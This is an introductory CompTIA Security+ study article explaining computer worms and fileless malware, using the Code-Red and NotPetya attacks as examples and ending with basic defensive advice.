Worms and Fileless Malware: The Sneaky Threats Lurking in Your Network (CompTIA Security+)

Worms and Fileless Malware: The Sneaky Threats Lurking in Your Network (CompTIA Security+)

A computer worm is a type of malware that can spread through a computer network and infect multiple devices without any user intervention. Unlike viruses, which require the user to perform some action, such as downloading or opening an infected file, worms can exploit vulnerabilities in software and operating systems to gain access to devices on a network.

Worms can consume network bandwidth and system resources as they replicate and spread throughout a network. They can also perform other malicious actions, such as stealing personal information or launching distributed denial of service (DDoS) attacks, which can render a website or network unavailable by overwhelming it with traffic.

The Devastating Impact of the Code-Red Worm on Microsoft Servers

One example of a worm that caused significant damage is the Code-Red worm, which infected early versions of Microsoft's Internet Information Services (IIS) web server software through a buffer overflow vulnerability. Once it gained access to a vulnerable server, Code-Red scanned random IP ranges to try to infect other vulnerable IIS servers. It is estimated that the worm caused up to $2 billion in damage worldwide.

Another type of malware that has gained prominence in recent years is fileless malware. This type of malware does not write any code to disk, making it more difficult for traditional antivirus software to detect and remove. Instead, fileless malware uses techniques that run in a computer's memory to carry out its malicious activities.

Fileless malware can also use "living off the land" techniques to evade detection. These techniques involve using legitimate system tools, such as the Windows Management Instrumentation (WMI) or Windows PowerShell, to carry out malicious activities. This can make it even harder for traditional antivirus software to detect and prevent attacks.

The NotPetya Attack: A Deceptive and Devastating Fileless Malware 

One well-known example of fileless malware is the NotPetya attack, which caused significant damage to companies worldwide in 2017. The attack used a vulnerability in the accounting software, M.E.Doc, to spread the malware throughout networks. In this cyber attack, the perpetrators used a deceptive technique to infiltrate the victim's computer system. They disguised a harmful piece of code as a legitimate update for a tax software program used in Ukraine. Once installed, the malware encrypted hard drives and prevented victims from accessing their files.

To protect against worms and fileless malware, it's important to keep software and operating systems up to date with the latest security patches and to use strong passwords and multifactor authentication. It's also important to use antivirus software that can detect and remove both traditional and fileless malware. Finally, users should be cautious about opening attachments or clicking on links in emails or messages from unknown or suspicious sources.

Want to learn more about what it’s like to work as an information security analyst? Check out our episode “ $90K and Remote? So, What DOES An Information Security Analyst Do?”